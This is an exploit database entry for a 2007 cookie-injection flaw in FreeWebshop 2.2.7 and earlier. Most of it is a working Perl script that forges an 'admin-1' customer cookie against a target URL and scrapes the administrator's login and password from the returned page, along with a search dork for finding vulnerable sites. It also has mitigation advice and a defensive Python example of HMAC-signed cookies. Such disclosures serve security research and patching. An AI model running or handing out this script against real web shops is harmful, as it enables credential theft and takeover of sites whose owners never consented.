Vendor: FreeWebshop
By: k1tk4t
CVSS: 7.5 HIGH
Cookie Injection
CWE: 352
Product Name: FreeWebshop
Affected Version From: <= 2.2.7
Affected Version To: <= 2.2.7
Patch Exists: NO
Related CWE:
CPE: a:freewebshop:freewebshop:2.2.7
Metasploit:
Other Scripts:
Platforms Tested:
2007

FreeWebshop <= 2.2.7 - (cookie) Admin Password Grabber Exploit

This exploit lets an attacker retrieve the admin username and password from FreeWebshop 2.2.7 and earlier. The target URL and path are given as command-line arguments. The script uses the LWP::UserAgent and HTTP::Cookies modules to request index.php?page=customer&action=show with an injected cookie (fws_cust=admin-1, or cookie_info=admin-1 for versions <= 2.2.4) and reads the admin login and password from the form fields of the returned page.

Mitigation:

Upgrade to a newer version of FreeWebshop that has fixed this vulnerability. Ensure that input validation and sanitization are implemented to prevent cookie injection attacks.
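The trust problem behind this issue, as an added example (not FreeWebshop's code, and written in Python rather than the shop's PHP): a lookup that accepts the cookie value as the identity, next to one that accepts only values carrying a server-made HMAC tag. The `<login>-<id>` value format is assumed from the `admin-1` value in the script below; the function names and the key are hypothetical.

```python
import hashlib
import hmac

# Constructed demo key; a real deployment keeps its key in server-side config.
SECRET = b"constructed-demo-key"


def parse_identity(value):
    """Split '<login>-<id>' (format assumed from the script's 'admin-1')."""
    login, sep, cust_id = value.rpartition("-")
    if not sep or not login or not (cust_id.isascii() and cust_id.isdigit()):
        return None
    return login, int(cust_id)


def trusting_lookup(cookie_value):
    """Weak pattern: the client-supplied value is taken as the identity."""
    return parse_identity(cookie_value)


def _tag(payload):
    """Hex HMAC-SHA256 of the payload under the server-side key."""
    return hmac.new(SECRET, payload.encode(), hashlib.sha256).hexdigest()


def issue_cookie(login, cust_id):
    """Called only after a successful password check."""
    payload = f"{login}-{cust_id}"
    return f"{payload}.{_tag(payload)}"


def verified_lookup(cookie_value):
    """Hardened pattern: accept only values carrying a server-made tag."""
    payload, sep, tag = cookie_value.rpartition(".")
    if not sep:
        return None
    # Constant-time comparison on bytes, so non-ASCII input cannot raise.
    if not hmac.compare_digest(tag.encode(), _tag(payload).encode()):
        return None
    return parse_identity(payload)


if __name__ == "__main__":
    forged = "admin-1"  # the cookie value the script sends
    print("trusting:", trusting_lookup(forged))
    print("verified:", verified_lookup(forged))
    print("issued  :", verified_lookup(issue_cookie("admin", 1)))
```

A server-side session that records the identity at login gives the same protection without placing the identity in the cookie at all.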

Exploit-DB raw data:

#!/usr/bin/perl
#
# Indonesian Newhack Security Advisory
# ------------------------------------
# FreeWebshop <= 2.2.7 - (cookie) Admin Password Grabber Exploit
# Time			:  Dec 17 2007 04:50AM
# Software		:  FreeWebshop <= 2.2.7
# Vendor		:  http://www.freewebshop.org/
# Demo Site		:  http://www.freewebshop.org/demo/
# Found by		:  k1tk4t  |  http://newhack.org
# Location		:  Indonesia
# Dork			:  "Powered by FreeWebshop"
#
# Thanks to:
# -[opt1lc, fl3xu5, ghoz]-
# str0ke, DNX, xoron, cyb3rh3b, K-159, the_hydra, y3dips
# nyubi,iFX,sin~X,kin9k0ng,bius,selikoer,aldy_BT
# Indonesian Security and Hacker Community
#
# ----------------------------[Cookie Injection]------------------------------------
use LWP::UserAgent;
use HTTP::Cookies;

if(!$ARGV[1])
{
 print "\n  |-------------------------------------------------|";
 print "\n  |         Indonesian Newhack Technology           |";
 print "\n  |-------------------------------------------------|";
 print "\n  |FreeWebshop 2.2.7 (cookie) Admin Password Grabber|";
 print "\n  |     Found by k1tk4t [k1tk4t(at)newhack.org]     |";
 print "\n  |-------------------------------------------------|";
 print "\n[!] ";
 print "\n[!] Penggunaan : perl freewebshop227.pl [URL] [Path] ";
 print "\n[!] Contoh     : perl freewebshop227.pl http://korban.site /WebShop/";
 print "\n[!] ";
 print "\n";
 exit;
}

my $site = $ARGV[0]; # Target site
my $path = $ARGV[1]; # Path of the envolution_1-0-1 directory

my $www = new LWP::UserAgent;
#my @cookie = ('Cookie' => "cookie_info=admin-1"); # For versions <= 2.2.4
my @cookie = ('Cookie' => "fws_cust=admin-1"); # For versions >= 2.2.6
my $http = "$site/$path/index.php?page=customer&action=show";
print "\n\n [~] Sedang Mencari Username dan Password.... \n";
my $injek = $www -> get($http, @cookie);
my $jawaban = $injek -> content;
if( $jawaban =~ /login value='(.*)'/ ){ print "\n [+] Username: $1"; 
$jawaban =~ /"password" name="pass1" size="10" maxlength="10" value="(.*)"/ , print "\n [+] Password: $1 \n";} 
else {print "\n [-] Gagal  :(  , Coba yang lain!";}

# ----------------------------[Done]------------------------------------

# milw0rm.com [2007-12-18]